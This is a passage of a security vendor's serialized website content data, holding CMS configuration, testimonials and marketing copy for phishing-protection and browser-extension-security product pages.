[{"data":1,"prerenderedAt":4643},["ShallowReactive",2],{"application-flags":3,"navbar":7,"always-visible-banner":95,"navbar-about-highlight":155,"navbar-resource-highlight":211,"use-case-page":256,"blog/installfix":1276},[4],{"name":5,"enabled":6},"maintenanceMode",false,[8,59,76],{"createdDate":9,"id":10,"name":11,"modelId":12,"published":13,"stageModifiedSincePublish":6,"query":14,"data":15,"variations":50,"lastUpdated":51,"firstPublished":52,"testRatio":33,"createdBy":53,"lastUpdatedBy":53,"folders":54,"meta":55,"rev":58},1742213002749,"efff2a27faf4408e9f908eba4b5542fe","inductive-automation","1c6207a5f24948ab82d4a0b17f251193","published",[],{"testimonial":16,"description":43,"type":19,"link":44,"title":47,"testimonialLink":48,"image":49},{"@type":17,"id":18,"model":19,"value":20},"@builder.io/core:Reference","f028f2b685bb47cd8bf9e82a26dd5a79","testimonial",{"query":21,"folders":22,"createdDate":23,"id":18,"name":24,"modelId":25,"published":13,"data":26,"variations":30,"lastUpdated":31,"firstPublished":32,"testRatio":33,"createdBy":34,"lastUpdatedBy":34,"meta":35,"rev":42},[],[],1735823466309,"We found Push to be more accurate when compared to competitors and the browser agent offered features that others couldn’t match.","42035571a56940ac98bff4544aa79aa5",{"author":27,"jobTitle":28,"quote":24,"image":29},"Jason Waits","\u003Cp>CISO at Inductive Automation\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Ff04c0c0689ce4a89ac0f0708d78c0a07",{},1735910703862,1735823501152,1,"ST0tXQM8slWpFrmioqKHmENB2qe2",{"kind":36,"lastPreviewUrl":37,"breakpoints":38,"hasAutosaves":41},"data","",{"small":39,"medium":40},640,768,true,"3v32gocrrqz","Join the industry's top security minds as they break down the browser attack landscape.",{"url":45,"text":46},"https://pushsecurity.com/webinar/state-of-browser-security","Save Your Spot","State of Browser Attacks 
Series","/customer-stories/inductive-automation","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fe94fca10aa7b46ac8052b7ea22de54cd",{},1776257019270,1742221533648,"CydmZnOWU1XuAaLhEDCoYNM4Z8W2",[],{"breakpoints":56,"kind":36,"lastPreviewUrl":37,"hasAutosaves":6},{"xsmall":57,"small":39,"medium":40},320,"motto9r9yg",{"createdDate":60,"id":61,"name":62,"modelId":12,"published":13,"query":63,"data":64,"variations":69,"lastUpdated":70,"firstPublished":71,"testRatio":33,"createdBy":53,"lastUpdatedBy":72,"folders":73,"meta":74,"rev":58},1742208588866,"1c7a4e423bf54ac1a328bb4063459ef2","Banner",[],{"type":65,"url":66,"text":67,"link":68},"web-banner","https://pushsecurity.com/resources/browser-attacks-report","Get our latest report analyzing browser attack techniques in 2026",{},{},1774258294825,1742208637545,"jKjF9r5jcvXU8tzZEfFQm31Iyvr2",[],{"kind":36,"lastPreviewUrl":37,"breakpoints":75,"hasAutosaves":41},{"xsmall":57,"small":39,"medium":40},{"createdDate":77,"id":78,"name":79,"modelId":12,"published":13,"stageModifiedSincePublish":6,"query":80,"data":81,"variations":89,"lastUpdated":90,"firstPublished":91,"testRatio":33,"createdBy":53,"lastUpdatedBy":53,"folders":92,"meta":93,"rev":58},1742208469288,"6763051b201f44a0838c6400c580ca67","Resource highlight",[],{"image":82,"type":83,"description":84,"link":85,"title":88},"https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F7b4a5ebf81d64e8c9d7fc35f6c96c4a9","resource","Learn about the latest techniques being used in the wild.",{"url":86,"text":87},"/resources/browser-attacks-report","Download now","Report: 2026 Browser Attack 
Techniques",{},1776255866789,1742208570400,[],{"kind":36,"lastPreviewUrl":37,"breakpoints":94,"hasAutosaves":6},{"xsmall":57,"small":39,"medium":40},{"createdDate":96,"id":97,"name":98,"modelId":99,"published":13,"query":100,"data":101,"variations":145,"lastUpdated":146,"firstPublished":147,"testRatio":33,"createdBy":34,"lastUpdatedBy":148,"folders":149,"meta":150,"rev":154},1774965361051,"fd266d0172cc47429be7ad10f48c99ad","always visible banner","0678d178ec8b41efb8a23c09dba7874d",[],{"ctaText":102,"text":103,"url":37,"blocks":104,"state":141},"ewrererw","testrfesssssssssss",[105,129],{"@type":106,"@version":107,"id":108,"component":109,"responsiveStyles":119},"@builder.io/sdk:Element",2,"builder-ca12c06a52de41d7b8743da53118cd38",{"name":110,"tag":110,"options":111,"isRSC":118},"TopBannerContent",{"text":112,"ctaText":46,"url":45,"mainText":113,"cta":116},"New Webinar Series: Join John Hammond, Troy Hunt, and Matt Johansen for the State of Browser Attacks",{"content":114,"fontSize":115},"\u003Cp>New Webinar Series: Join John Hammond, Troy Hunt, and Matt Johansen for the State of Browser Attacks\u003C/p>","text-base",{"content":117,"fontSize":115,"url":45},"\u003Cp>\u003Cstrong style=\"font-weight:700;\">Save Your 
Spot\u003C/strong>\u003C/p>\n",null,{"large":120},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"marginTop":126,"marginBottom":126,"fontSize":127,"fontWeight":128},"flex","column","relative","0","border-box",".56rem","1.125rem","700",{"id":130,"@type":106,"tagName":131,"properties":132,"responsiveStyles":136},"builder-pixel-08zrjigffq5t","img",{"src":133,"aria-hidden":134,"alt":37,"role":135,"width":124,"height":124},"https://cdn.builder.io/api/v1/pixel?apiKey=f3a1111ff5be48cdbb123cd9f5795a05","true","presentation",{"large":137},{"height":124,"width":124,"display":138,"opacity":124,"overflow":139,"pointerEvents":140},"block","hidden","none",{"deviceSize":142,"location":143},"large",{"path":37,"query":144},{},{},1775137295127,1774968080803,"ax7YYfD0OCeqT1Vxxv1G4FUbqVr1",[],{"breakpoints":151,"hasLinks":6,"kind":152,"lastPreviewUrl":153,"hasAutosaves":6},{"xsmall":57,"small":39,"medium":40},"component","https://pushsecurity.com/?builder.space=f3a1111ff5be48cdbb123cd9f5795a05&builder.user.permissions=read%2Ccreate%2Cpublish%2CeditCode%2CeditDesigns%2CeditLayouts%2CeditLayers%2CeditContentPriority%2CeditFolders%2CeditProjects%2CmodifyMcpServers%2CmodifyWorkflowIntegrations%2CmodifyProjectSettings%2CconnectCodeRepository%2CcreateProjects%2CindexDesignSystems%2CsendPullRequests%2CmergePullRequests&builder.user.role.name=Developer&builder.user.role.id=developer&builder.cachebust=true&builder.preview=always-visible-banner&builder.noCache=true&builder.allowTextEdit=true&__builder_editing__=true&builder.overrides.always-visible-banner=fd266d0172cc47429be7ad10f48c99ad&builder.overrides.fd266d0172cc47429be7ad10f48c99ad=fd266d0172cc47429be7ad10f48c99ad&builder.options.locale=Default","2lvuonnywj",[156,180],{"createdDate":157,"id":158,"name":159,"modelId":160,"published":13,"stageModifiedSincePublish":6,"query":161,"data":162,"variations":173,"lastUpdated":174,"firstPublished":175,"testRatio":33,"createdBy":53,"lastUpdatedBy":53,"folders":176,
"meta":177,"rev":179},1776247359804,"9136a8f18b3b4a6ba29b8653a99372b1","testimonial-inductive-automation","20d9eaa352304613b3d1a794b400703d",[],{"link":163,"type":19,"testimonialLink":48,"testimonial":164},{},{"@type":17,"id":18,"model":19,"value":165},{"query":166,"folders":167,"createdDate":23,"id":18,"name":24,"modelId":25,"published":13,"data":168,"variations":169,"lastUpdated":31,"firstPublished":32,"testRatio":33,"createdBy":34,"lastUpdatedBy":34,"meta":170,"rev":172},[],[],{"author":27,"jobTitle":28,"quote":24,"image":29},{},{"kind":36,"lastPreviewUrl":37,"breakpoints":171,"hasAutosaves":41},{"small":39,"medium":40},"7t755zfvte3",{},1776247404986,1776247404973,[],{"breakpoints":178,"kind":36,"lastPreviewUrl":37,"hasAutosaves":6},{"xsmall":57,"small":39,"medium":40},"4moh0qpywtr",{"createdDate":181,"id":182,"name":88,"modelId":160,"published":13,"meta":183,"stageModifiedSincePublish":6,"query":185,"data":186,"variations":207,"lastUpdated":208,"firstPublished":209,"testRatio":33,"createdBy":53,"lastUpdatedBy":53,"folders":210,"rev":179},1776255761419,"05a9322735fc427db12e2740e4302300",{"breakpoints":184,"kind":36,"lastPreviewUrl":37,"hasAutosaves":6},{"xsmall":57,"small":39,"medium":40},[],{"testimonial":187,"link":206,"type":83,"title":88,"description":84,"image":82},{"@type":17,"id":188,"model":19,"value":189},"192acbb1f9ca4cac918c0ec435a8bae3",{"query":190,"folders":191,"createdDate":192,"id":188,"name":193,"modelId":25,"published":13,"data":194,"variations":200,"lastUpdated":201,"firstPublished":202,"testRatio":33,"createdBy":34,"lastUpdatedBy":53,"meta":203,"rev":205},[],[],1728981467463,"Push does for identity what CrowdStrike did for the 
endpoint",{"video":195,"jobTitle":196,"author":197,"qoute":37,"quote":198,"image":199},"https://cdn.builder.io/o/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F8b30e8ca50064058bbaef0f3c6164575%2Fcompressed?apiKey=f3a1111ff5be48cdbb123cd9f5795a05&token=8b30e8ca50064058bbaef0f3c6164575&alt=media&optimized=true","\u003Cp>Deputy CISO at Microsoft\u003C/p>\u003Cp>Former LinkedIn, Slack, Palantir\u003C/p>","Geoff Belknap","Push does for identity what CrowdStrike did for the endpoint.","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F748f0ad0a5064a00a13f4721fcc8dea1",{},1742902158597,1728981782923,{"kind":36,"lastPreviewUrl":37,"breakpoints":204,"hasAutosaves":41},{"small":39,"medium":40},"6s8ic0w0ao6",{"text":87,"url":86},{},1776255810913,1776255810900,[],[212,235],{"createdDate":213,"id":214,"name":88,"modelId":215,"published":13,"meta":216,"stageModifiedSincePublish":6,"query":218,"data":219,"variations":230,"lastUpdated":231,"firstPublished":232,"testRatio":33,"createdBy":53,"lastUpdatedBy":53,"folders":233,"rev":234},1776256900280,"1f429607996e4e5fae8fe3f9b9610e55","4829faa81e7c4ee8bd2d000e160e8d3c",{"breakpoints":217,"kind":36,"lastPreviewUrl":37,"hasAutosaves":6},{"xsmall":57,"small":39,"medium":40},[],{"testimonial":220,"link":229,"type":83,"title":88,"description":84,"image":82},{"@type":17,"id":188,"model":19,"value":221},{"query":222,"folders":223,"createdDate":192,"id":188,"name":193,"modelId":25,"published":13,"data":224,"variations":225,"lastUpdated":201,"firstPublished":202,"testRatio":33,"createdBy":34,"lastUpdatedBy":53,"meta":226,"rev":228},[],[],{"video":195,"jobTitle":196,"author":197,"qoute":37,"quote":198,"image":199},{},{"kind":36,"lastPreviewUrl":37,"breakpoints":227,"hasAutosaves":41},{"small":39,"medium":40},"r77qqueuo3j",{"text":87,"url":86},{},1776256937553,1776256937540,[],"q0jkez80wkg",{"createdDate":236,"id":237,"name":11,"modelId":215,"published":13,"stageModifiedSincePublish":6,"query":238,"data":239,"variations
":250,"lastUpdated":251,"firstPublished":252,"testRatio":33,"createdBy":53,"lastUpdatedBy":53,"folders":253,"meta":254,"rev":234},1776256949234,"ce043785b71b4ece98eac811ecf4ba10",[],{"link":240,"type":19,"testimonial":241,"testimonialLink":48},{},{"@type":17,"id":18,"model":19,"value":242},{"query":243,"folders":244,"createdDate":23,"id":18,"name":24,"modelId":25,"published":13,"data":245,"variations":246,"lastUpdated":31,"firstPublished":32,"testRatio":33,"createdBy":34,"lastUpdatedBy":34,"meta":247,"rev":249},[],[],{"author":27,"jobTitle":28,"quote":24,"image":29},{},{"kind":36,"lastPreviewUrl":37,"breakpoints":248,"hasAutosaves":41},{"small":39,"medium":40},"mnaneamy308",{},1776256974140,1776256974130,[],{"breakpoints":255,"kind":36,"lastPreviewUrl":37,"hasAutosaves":6},{"xsmall":57,"small":39,"medium":40},[257,441,560,679,797,917,1037,1157],{"createdDate":258,"id":259,"name":260,"modelId":261,"published":13,"stageModifiedSincePublish":6,"query":262,"data":268,"variations":429,"lastUpdated":430,"firstPublished":431,"testRatio":33,"screenshot":432,"createdBy":34,"lastUpdatedBy":433,"folders":434,"meta":435,"rev":440},1744829487099,"387451215c314dd5bd654668cdc1a197","Zero-day phishing","cca4143377554c5a9163cc203a8ed2ba",[263],{"@type":264,"property":265,"operator":266,"value":267},"@builder.io/core:Query","urlPath","is","/uc/zero-day-phishing-protection",{"inputs":269,"customFonts":270,"seoTitle":318,"title":318,"tsCode":37,"seoDescription":319,"fontAwesomeIcon":320,"jsCode":37,"blocks":321,"url":267,"state":426},[],[271],{"family":272,"kind":273,"version":274,"lastModified":275,"files":276,"category":295,"menu":296,"subsets":297,"variants":300},"DM 
Sans","webfonts#webfont","v14","2023-07-13",{"100":277,"200":278,"300":279,"500":280,"600":281,"700":282,"800":283,"900":284,"800italic":285,"900italic":286,"700italic":287,"100italic":288,"italic":289,"regular":290,"200italic":291,"500italic":292,"300italic":293,"600italic":294},"https://fonts.gstatic.com/s/dmsans/v14/rP2tp2ywxg089UriI5-g4vlH9VoD8CmcqZG40F9JadbnoEwAop1hTmf3ZGMZpg.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2tp2ywxg089UriI5-g4vlH9VoD8CmcqZG40F9JadbnoEwAIpxhTmf3ZGMZpg.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2tp2ywxg089UriI5-g4vlH9VoD8CmcqZG40F9JadbnoEwA_JxhTmf3ZGMZpg.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2tp2ywxg089UriI5-g4vlH9VoD8CmcqZG40F9JadbnoEwAkJxhTmf3ZGMZpg.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2tp2ywxg089UriI5-g4vlH9VoD8CmcqZG40F9JadbnoEwAfJthTmf3ZGMZpg.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2tp2ywxg089UriI5-g4vlH9VoD8CmcqZG40F9JadbnoEwARZthTmf3ZGMZpg.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2tp2ywxg089UriI5-g4vlH9VoD8CmcqZG40F9JadbnoEwAIpthTmf3ZGMZpg.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2tp2ywxg089UriI5-g4vlH9VoD8CmcqZG40F9JadbnoEwAC5thTmf3ZGMZpg.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2rp2ywxg089UriCZaSExd86J3t9jz86Mvy4qCRAL19DksVat8JCm3zRmYJpso5.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2rp2ywxg089UriCZaSExd86J3t9jz86Mvy4qCRAL19DksVat8gCm3zRmYJpso5.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2rp2ywxg089UriCZaSExd86J3t9jz86Mvy4qCRAL19DksVat9uCm3zRmYJpso5.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2rp2ywxg089UriCZaSExd86J3t9jz86Mvy4qCRAL19DksVat-JDG3zRmYJpso5.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2rp2ywxg089UriCZaSExd86J3t9jz86Mvy4qCRAL19DksVat-JDW3zRmYJpso5.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2tp2ywxg089UriI5-g4vlH9VoD8CmcqZG40F9JadbnoEwAopxhTmf3ZGMZpg.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2rp2ywxg089UriCZaSExd86J3t9jz86Mvy4qCRAL19DksVat8JDW3zRmYJpso5.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2rp2ywxg089UriCZaSExd86J3t9jz86Mvy4qCRAL19Dks
Vat-7DW3zRmYJpso5.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2rp2ywxg089UriCZaSExd86J3t9jz86Mvy4qCRAL19DksVat_XDW3zRmYJpso5.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2rp2ywxg089UriCZaSExd86J3t9jz86Mvy4qCRAL19DksVat9XCm3zRmYJpso5.ttf","sans-serif","https://fonts.gstatic.com/s/dmsans/v14/rP2tp2ywxg089UriI5-g4vlH9VoD8CmcqZG40F9JadbnoEwAopxRT23z.ttf",[298,299],"latin","latin-ext",[301,302,303,304,305,306,128,307,308,309,310,311,312,313,314,315,316,317],"100","200","300","regular","500","600","800","900","100italic","200italic","300italic","italic","500italic","600italic","700italic","800italic","900italic","Zero-day phishing protection","Detect phishing TTPs directly in the browser and stop credential theft.","faFishingRod",[322,421],{"@type":106,"@version":107,"tagName":323,"id":324,"children":325},"div","builder-76c6b8d1499346c7bc1fd56ae4e93638",[326,343,351,358,370,385,396,407,413],{"@type":106,"@version":107,"layerName":327,"id":328,"component":329,"responsiveStyles":340},"UseCaseHero","builder-5228fe062bef4a40a91e43f1112832fa",{"name":327,"options":330,"isRSC":118},{"title":318,"description":331,"points":332,"video":339},"\u003Cp>Push detects phishing as it happens. Autonomous agents hunt for new phishing techniques, identify kit signatures, and deploy detections within minutes of a new attack being analyzed. 
From cloned login pages to AiTM credential harvesting, Push sees what traditional filters miss and stops threats before they escalate.\u003C/p>",[333,335,337],{"item":334},"Detect phishing that bypasses traditional filters, including AiTM, SSO password theft, and fake login pages",{"item":336},"Stop never-before-seen attacks with AI-native behavioral and on-page analysis inside the browser",{"item":338},"Investigate faster with unified browser, user, and page context","https://cdn.builder.io/o/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F40433ceeb4f94b43a82e039a0f4fd411%2Fcompressed?apiKey=f3a1111ff5be48cdbb123cd9f5795a05&token=40433ceeb4f94b43a82e039a0f4fd411&alt=media&optimized=true",{"large":341},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":342},"transparent",{"@type":106,"@version":107,"id":344,"component":345,"responsiveStyles":348},"builder-96634044407e491299e291ed64669e39",{"name":346,"options":347,"isRSC":118},"TrustedBy",{"AllPartners":41,"backgroundTransparent":6},{"large":349},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":350},"#000",{"@type":106,"@version":107,"id":352,"component":353,"responsiveStyles":356},"builder-2c3768f930534557bb8978e32b6a6a0f",{"name":354,"options":355,"isRSC":118},"Diagonal",{"darkMode":41},{"large":357},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"layerName":359,"id":360,"component":361,"responsiveStyles":368},"TextImageBlockVertical","builder-7c3c1c2840424db2ad2ccbfaf382dd64",{"name":359,"tag":359,"options":362,"isRSC":118},{"darkMode":6,"maxWidth":363,"maxTextWidth":364,"title":365,"description":366,"animatedTitle":37,"image":367,"reverse":6,"descriptionPaddingHorizontal":118},1200,800,"\u003Ch2>Why stop at the inbox?\u003C/h2>","\u003Cp>Phishing attacks have evolved. 
Whether attackers lure users with QR codes, instant messages, or OAuth consent screens, the outcome is the same: it plays out in the browser. Push gives you real-time detection for in-browser threats, stopping phishing and consent-based attacks before they lead to compromise.\u003C/p>\u003Cp>\u003Cbr>\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F7fdcac241f0e4a049166d7076858adeb",{"large":369},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":371,"component":372,"responsiveStyles":380},"builder-41c978b3669749cf947e622b4e79e4d7",{"name":373,"options":374,"isRSC":118},"TextImageBlockHorizontal",{"darkMode":6,"maxWidth":363,"imageMaxWidth":375,"textPaddingTop":376,"title":377,"description":378,"reverse":41,"image":379},600,100,"\u003Cp>Detect phishing at the edge\u003C/p>","\u003Cp>Push uses industry-first telemetry to detect phishing based on behavior, not static indicators. Autonomous agents analyze how phishing pages behave and how users interact with them, uncovering fake logins, credential theft, and phishing kits the moment they load in the browser.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F9df3d180c97b4e61af142af2ccd68721",{"large":381},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"fontFamily":382,"paddingTop":383,"marginTop":384},"DM Sans, sans-serif","20px","0px",{"@type":106,"@version":107,"id":386,"component":387,"responsiveStyles":393},"builder-d2a7bc941feb43cdb898bc116b203cf9",{"name":373,"options":388,"isRSC":118},{"darkMode":6,"maxWidth":363,"imageMaxWidth":375,"textPaddingTop":389,"title":390,"description":391,"reverse":6,"image":392},120,"\u003Ch2>Go beyond blocklists and IOCs\u003C/h2>","\u003Cp>Push goes beyond URLs and easy-to-change indicators. 
It reads the full phishing playbook (script behavior, session hijacks, DOM changes, and user inputs), then connects the dots in real time. This gives your team a complete picture of how the phishing attempt worked, not just an alert.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fabfd58db169b433e96d3f1261797156e",{"large":394},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":395},"36px",{"@type":106,"@version":107,"layerName":373,"id":397,"component":398,"responsiveStyles":404},"builder-42c32198083f4880acb37c5cb76934da",{"name":373,"options":399,"isRSC":118},{"darkMode":6,"maxWidth":363,"imageMaxWidth":375,"textPaddingTop":400,"title":401,"description":402,"reverse":41,"image":403},140,"\u003Ch2>Enhance your phishing response\u003C/h2>","\u003Cp>When phishing enters your environment, speed matters. Push gives you instant access to the telemetry that counts, such as session data, user behavior, and page activity, so you can investigate fast, trigger in-browser prompts, or forward alerts to your SIEM or SOAR for response. 
All in real time, right from the browser.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fbb195aec46904056b85e8688629e558e",{"large":405},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":406},"47px",{"@type":106,"@version":107,"id":408,"component":409,"responsiveStyles":411},"builder-9a95b9cbc4854421a92ef7b90f6c7adb",{"name":354,"options":410,"isRSC":118},{"darkMode":6},{"large":412},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":414,"component":415,"responsiveStyles":419},"builder-0afa17a9f25c4661a90f314d5578aa18",{"name":416,"tag":416,"options":417,"isRSC":118},"LatestResources",{"sectionHeading":37,"customClass":418},"bg-black",{"large":420},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"id":422,"@type":106,"tagName":131,"properties":423,"responsiveStyles":424},"builder-pixel-21yj6h3p4wh",{"src":133,"aria-hidden":134,"alt":37,"role":135,"width":124,"height":124},{"large":425},{"height":124,"width":124,"display":138,"opacity":124,"overflow":139,"pointerEvents":140},{"deviceSize":142,"location":427},{"path":37,"query":428},{},{},1776275046831,1745499158657,"https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fff60c30a8442489c8ed7e0af9599d14f","kYgMv6WsbvfmlOUYqR2SFwGzw6e2",[],{"lastPreviewUrl":436,"winningTest":118,"breakpoints":437,"kind":438,"hasLinks":6,"originalContentId":439,"hasAutosaves":6},"https://pushsecurity.com/uc/zero-day-phishing-protection?builder.space=f3a1111ff5be48cdbb123cd9f5795a05&builder.user.permissions=read%2Ccreate%2Cpublish%2CeditDesigns%2CeditLayouts%2CeditLayers%2CeditContentPriority%2CeditFolders%2CcreateProjects%2CsendPullRequests&builder.user.role.name=Designer&builder.user.role.id=creator&builder.cachebust=true&builder.preview=use-case-page&builder.noCache=true&builder.allowTextEdit=true&__builder_editing__=true&
builder.overrides.use-case-page=387451215c314dd5bd654668cdc1a197&builder.overrides.387451215c314dd5bd654668cdc1a197=387451215c314dd5bd654668cdc1a197&builder.overrides.use-case-page:/uc/zero-day-phishing-protection=387451215c314dd5bd654668cdc1a197&builder.options.locale=Default",{"xsmall":57,"small":39,"medium":40},"page","2daa5670b8504fc7ba4700633e8bd921","atvz4dp24b7",{"createdDate":442,"id":443,"name":444,"modelId":261,"published":13,"stageModifiedSincePublish":6,"query":445,"data":448,"variations":552,"lastUpdated":553,"firstPublished":554,"testRatio":33,"screenshot":555,"createdBy":34,"lastUpdatedBy":433,"folders":556,"meta":557,"rev":440},1756833377777,"54f8256648f54d439303734b1e69221b","Browser extension security",[446],{"@type":264,"property":265,"operator":266,"value":447},"/uc/browser-extension-security",{"seoDescription":449,"jsCode":37,"fontAwesomeIcon":450,"tsCode":37,"title":444,"seoTitle":444,"customFonts":451,"inputs":456,"blocks":457,"url":447,"state":549},"Shine a light on risky browser extensions.","faPuzzlePiece",[452],{"kind":273,"family":272,"version":274,"files":453,"category":295,"lastModified":275,"subsets":454,"variants":455,"menu":296},{"100":277,"200":278,"300":279,"500":280,"600":281,"700":282,"800":283,"900":284,"100italic":288,"italic":289,"regular":290,"900italic":286,"800italic":285,"700italic":287,"200italic":291,"300italic":293,"500italic":292,"600italic":294},[298,299],[301,302,303,304,305,306,128,307,308,309,310,311,312,313,314,315,316,317],[],[458,544],{"@type":106,"@version":107,"tagName":323,"id":459,"meta":460,"children":461},"builder-71d0648c1d2f4ede8d0d0b5b28b7b94c",{"previousId":324},[462,478,485,492,501,511,521,531,538],{"@type":106,"@version":107,"id":463,"meta":464,"component":465,"responsiveStyles":476},"builder-ff325b4b8fad4edea53f38865947e854",{"previousId":328},{"name":327,"options":466,"isRSC":118},{"title":444,"description":467,"points":468,"video":475},"\u003Cp>Browser extensions introduce new code, new 
permissions, and new potential for risk. Many include AI features, and most go completely unnoticed. Push gives you full visibility into every extension used across your workforce, across major browsers, so you can uncover shadow IT, assess risky permissions, and block unsafe tools before they lead to compromise.\u003C/p>",[469,471,473],{"item":470},"Discover every browser extension in use",{"item":472},"Spot risky or unsanctioned behavior",{"item":474},"Make informed decisions on extension policy","https://cdn.builder.io/o/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fc538aad95d7f403aa3c3551af72f67c0?alt=media&token=1411fa6d-2eac-4e6c-94bf-ea117da12d67&apiKey=f3a1111ff5be48cdbb123cd9f5795a05",{"large":477},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":342},{"@type":106,"@version":107,"id":479,"meta":480,"component":481,"responsiveStyles":483},"builder-fb89d128c64e47cf9cbb11d90fc24523",{"previousId":344},{"name":346,"options":482,"isRSC":118},{"AllPartners":41,"backgroundTransparent":6},{"large":484},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":350},{"@type":106,"@version":107,"id":486,"meta":487,"component":488,"responsiveStyles":490},"builder-54388d35126c4d0096eeebaf8c4448cd",{"previousId":352},{"name":354,"options":489,"isRSC":118},{"darkMode":41},{"large":491},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"layerName":359,"id":493,"component":494,"responsiveStyles":499},"builder-3c8fa6785dd6466abf52a2470d66d85a",{"name":359,"tag":359,"options":495,"isRSC":118},{"darkMode":6,"maxWidth":363,"maxTextWidth":364,"title":496,"description":497,"image":498,"reverse":6},"\u003Ch2>Take control of browser extensions\u003C/h2>","\u003Cp>Attackers are increasingly using malicious browser extensions to gain access to data processed and stored in the browser. 
And the problem is, most security teams have no visibility into what extensions are being used. Push changes that. With browser-native telemetry, the Push extension continuously inventories browser extensions across your environment, flags the risky ones, and gives you intelligence to act.&nbsp;\u003C/p>\u003Cp>\u003Cbr>\u003C/p>\u003Cp>\u003Cbr>\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F0a004f16a6874f4c8fdf14344acc9fec",{"large":500},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":502,"meta":503,"component":504,"responsiveStyles":509},"builder-93738f98109a4009affb349afd7bb182",{"previousId":371},{"name":373,"options":505,"isRSC":118},{"darkMode":6,"maxWidth":363,"imageMaxWidth":375,"textPaddingTop":376,"title":506,"description":507,"reverse":41,"image":508},"\u003Ch2>Discover every extension in use\u003C/h2>","\u003Cp>Push gives you structured, searchable data about every extension in your environment, so you’re not just seeing what’s there, but also understanding how it got there, what it can do, and who it affects. 
It’s the kind of granular insight that’s nearly impossible to get from traditional tools, and it lays the groundwork for better policy decisions and faster investigations.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F0e5727ca99474f14b1b7916bf6bbb782",{"large":510},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"fontFamily":382,"paddingTop":383,"marginTop":384},{"@type":106,"@version":107,"id":512,"meta":513,"component":514,"responsiveStyles":519},"builder-83393acb12ee4fdd840839185b51edb4",{"previousId":386},{"name":373,"options":515,"isRSC":118},{"darkMode":6,"maxWidth":363,"imageMaxWidth":375,"textPaddingTop":389,"title":516,"description":517,"reverse":6,"image":518},"\u003Ch2>Spot risky or malicious extensions\u003C/h2>","\u003Cp>Push highlights extensions with dangerous permissions, broad access, or poor reputations. This includes AI extensions that request access far beyond what their stated purpose requires. You can quickly detect sideloaded, manually installed, or development-mode extensions that bypass normal controls. And because Push shows you who’s using them and where, you can respond precisely and effectively.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fa104d58c8da34fbb8901f738fb21453b",{"large":520},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":395},{"@type":106,"@version":107,"layerName":373,"id":522,"meta":523,"component":524,"responsiveStyles":529},"builder-da98e3de949646d89c53a0d1c2784664",{"previousId":397},{"name":373,"options":525,"isRSC":118},{"darkMode":6,"maxWidth":363,"imageMaxWidth":375,"textPaddingTop":400,"title":526,"description":527,"reverse":41,"image":528},"\u003Ch2>Accelerate security reviews\u003C/h2>","\u003Cp>Most teams have extension policies, they just don’t have the data to enforce them. 
